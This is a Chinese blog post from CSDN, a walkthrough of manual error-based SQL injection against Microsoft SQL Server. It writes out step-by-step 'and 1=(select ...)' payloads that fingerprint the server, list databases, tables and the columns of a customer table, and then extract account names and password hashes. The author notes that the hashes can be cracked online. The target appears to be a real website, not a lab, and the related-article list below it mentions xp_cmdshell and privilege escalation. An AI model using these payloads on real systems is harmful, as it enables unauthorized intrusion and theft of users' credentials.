mssql注入和mysql注入_MSSQL手工注入

最新推荐文章于 2024-08-20 18:38:45 发布
最新推荐文章于 2024-08-20 18:38:45 发布
阅读量151 收藏
点赞数
文章标签: mssql注入和mysql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36269652/article/details/113904067
版权

注入点屏蔽了and语句and 1=2没有报错,就用or语句。

7a9ce980d52d1acbc74c2d6c1ec5e486.png

4b1e0d58dbdd55a2eb68711b9fa2a999.png

and (select count(*) from sysobjects)>0返回正常就是mssql数据库

d00a0ef72064833466d4bcff1f42a663.png

and 1=(select @@version)查看版本信息

28a83b3969fbab5639ccc9494ce480fc.png

and 1=(select db_name())获取当前所在数据库名(对其他数据库没有权限)

6d83501881523bf7365f229f38453ab7.png

and 1=(select top 1 name from master..sysdatabases where dbid>4)

获取第一个数据库名

32cc92f85bc0cd96bbfdc5f0feb54672.png

and 1=(select top 1 name from master..sysdatabases where dbid>4 andname <> '第一个数据库库名')获取第二个数据库库名

9a89d1bfb92458893102bda04becf49e.png

可以继续爆数据库:and 1=(select top 1 name from master..sysdatabaseswhere dbid>4 and name <> '第一个库名' and name <> '第二个库名')

89ea754e5511a8c0322e6abb64069a16.png

以此类推我爆出了6个数据库

and 1=(select top 1 name from master..sysdatabases where dbid>4 andname <> '第一个库名' and name <> '第二个库名' and name <> '第三个库名' and name <> '第四个库名' and name <> '第五个库名' and name <> '第六个库名')

8664bcb6cb24139ac4fcac433699ffe8.png

获取第一个当前使用的数据库表名:and 1=(select top 1 name from sysobjects wherextype='u')

3df0490bb7724af6d36789f28eb3ab25.png

获取第二个当前使用的数据库表名:and 1=(select top 1 name from sysobjects where xtype='u’and name <> '第一个数据库表名')

0ad2e1791f6cd49465e0b95f9b96839e.png

以此类推一直把所有表名全部爆出(超痛苦~)

and 1=(select top 1 name from sysobjects wherextype='u' and name <> '表1' and name <> '表2' and name <> '表3' and name <> '表4' and name <> '表5' and name <> '.......................... and name <> '表42')

32d635169d9d0dc9b9a6d940c04a2c33.png

获取第一个当前使用的数据库中的表(CusTomer)中的字段:and 1=(select top 1 name from syscolumns whereid=(select id from sysobjects where name = 'CusTomer'))

9537b0c55af7d20fec0937d5e1eca8bb.png

同理,一直爆该表的字段,爆完为止:and 1=(select top 1 name from syscolumns where id= (select id fromsysobjects where name = 'CusTomer')and name <> 'Account' and name<> 'Account_UseMode' and name <> 'Address' and name <>'AvailDate' and name <> 'Bind_IP' and name <> 'ContactType' andname <> 'CreateDate' and name <> 'CusTomer_ID' and name <>'CusTomer_UUID' and name <> 'Discount' and name <> 'Distinction'and name <> 'IDCardNo' and name <> 'LastCheckDate' and name<> 'LastProgID' and name <> 'LastTime' and name <> 'ModiMail'and name <> 'ModiPass' and name <> 'PayMode' and name <>'PBAnswer' and name <> 'PBQuestion' and name <> 'Purchase_Mode' andname <> 'RealName' and name <> 'Status' and name  <> 'UserAge' and name <>'UserDuty' and name <> 'UserMail' and name <> 'UserMemo' and name<> 'UserName' and name <> 'UserPass' and name <>'UserTechPost')

b00d86a4603f8c8ec9753dffe6430342.png

获取第一个当前使用的数据库中的表(UserPass)中的列(CusTomer)的字段:and 1=(select top1 UserPass from CusTomer)

6a53f1f524a87c27b809e607f277b088.png

UserName需要一些技巧,需要编码:

76ebd27e69cca27950a847c346a0f2e0.png

账号密码都有了,密码是MD5加密,网上有很多都解密的!

欢迎大佬们多多批评指点!591e46b550c8882cc95e8d9ec039b5a6.gif

晨风

嘟嘟杜杜嘟
关注
mssqlmysql注入区别_Mssql手工注入小结
weixin_31623343的博客
02-01 570
前言:说起sql注入环境,网上流行的一些漏洞靶场基本上都是基于Mysql+Apache搭建的,所以我对mysql手注及提权多多少少有一定的了解,但对mssql还很陌生,为了避免过度依赖sqlmap一把梭的尴尬局面,于是有了这篇文章。环境介绍:搭建环境:win7 + SQL Server 2008 R2 + IIS7.5win7开放1433端口sql server 2008 r2下载及搭建过程参考...
mysql post手工注入_pikachu-数字型注入(post)#手工注入
weixin_39842237的博客
02-07 709
1,因为是post型,所以需要抓取数据包2,测试结果为数字型注入提交恒等的语句可以查询到所有的数据信息3,使用UNION联合查询法判断字段数,测试为2个字段时没有报错,所以可以判断字段数为24,爆字段 #发现两个都可以查询5,查询数据库 #可以查到数据库名称为 pikachu6,查数据库pikachu下的表 #可以查到库pikachu下面有5个表(httpinfo,member,message,u...
MsSQL手工注入
08-20
MsSQL手工注入
mssql数据库的注入
m0_57347472的博客
04-03 1756
db_name() 数据库名@@version 版本信息User_name() 当前用户host_name() 计算机名称。
MSSQL手工注入
最新发布
m0_73771249的博客
08-20 454
输入' 发现报错,输入' --+ 页面正常,存在sql注入
mssql手工注入
baynk的博客
06-10 1065
有点时间可以搞一下了mssql server了。 SQL server MSSQL其实也就是SQL server,通常和asp或者aspx一起搭配使用,都说MSSQLMYSQL相似,但是我咋感觉还是挺不一样啊,真是麻烦。。。 MSSQL基础就不写了,直接走起。 注入过程 常规手段测试注入点是否存在,加了引号就有报错了,用and来测试当1=2时也会不正常显示。 通过order by来测试当前...
mysql union as 注入_Mysql 手工注入【常规 Union 查询篇】
weixin_42499681的博客
02-17 272
文章来源于:lsh4ck's Blog在开始真正的注入技巧之前,我们先来大致回顾下必要的 mysql 数据库基础下面是注入 Mysql 时经常会用到的一些单行函数,熟练使用是灵活注入的前提,尤其是在对抗一些 Waf 的时候字符串连接函数,将多个字符串连接成一个字符串,注意,中间只要字符串有一个为空,最后结果也为空 同样是连接多个字符串,但可以在开头指定分隔符,跟 concat()稍微不同,它会自动...
MSSQL注入手工注入mssql提权
代码审计
04-18 2264
mssql数据库 mssql数据库相比mysql数据库本质上的框架是差不多的,使用的增,删,改,查命令是互相通的,mysql中使用的函数在mssql中有些会起不到作用点。 MSSQL数据库的基本知识 MSSQL中自带数据库信息 库名 相关功能 master 系统控制数据库,包含配置信息,用户登录信息,系统运行状态 model 模板数据库,数据库时建立所有数据库的模板。 tempdb 临时容器,保存所有的临时表,存储过程和其他程序交互的临时文件 msdb 主要为用户使用,记录着计划
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2480
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入数据库类型分:sql:oracle、MySQL、mssql、access、sq...
MSSQL数据注入
m0_55563900的博客
04-06 226
SQL Server/MSSQL是美国microsoft公司推出的一种关系型数据库系统,是一个可扩散的,高性能的,为分布式客户机/服务器计算机所设计的数据库管理系统。 其主要特点如下: (1)高性能设计,可充分利用WindowsNT的优势; (2)系统管理先进,支持windows图形化管理工具; (3)强壮的事物处理功能,采用各种方法保证数据的完整性 (4)支持对称多处理器结构,存储过程; (5)数据库端口1433 MSSQL数据注入-三张特殊表 sysdatabases–管理已经存在的数据库 (1)查看
注入之mssql数据库(手工注入
2301_79194110的博客
09-15 263
恢复 EXEC sp_configure 'show advanced options', 1;-- 判断当前数据库用户是否为db_owner权限。insert into black exec master..xp_cmdshell 'dir /s c:\1.aspx'-- 当前库testDB。没有xp_cmdshell。
MsSql手工注入——————笔记
tell_me_404的博客
02-27 460
一、mssql的基本介绍 access :多为asp脚本 Mssql : 多为aspx动态脚本语言 适用于中小型企业,学校(也有oracle) 基要:(默认端口1433,文件.mdf(数据库) .ldf(日志) mssql简单操作 1、新建数据库:设置列名表名和内容及其它 -------占用状态下不能删除,故分离 2、删除数据库:分离-删除连接和源路径文件 3、复制数据库:分离-复制源路径文件...
墨者-mssql手工注入
星空下de青铜
05-09 310
发现链接 and 1=1正常 and 1=2错误 ‘ 错误 存在注入 order by 3错误 4正常 5错误 and (select count() from sysobjects) >0 MSSQL and (select count() from msysobjects) >0 ACCESS id =-2 union all select null,null,null,null 4个null 发现2成功回显 看数据库有啥 个人猜测为mozhe_d
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值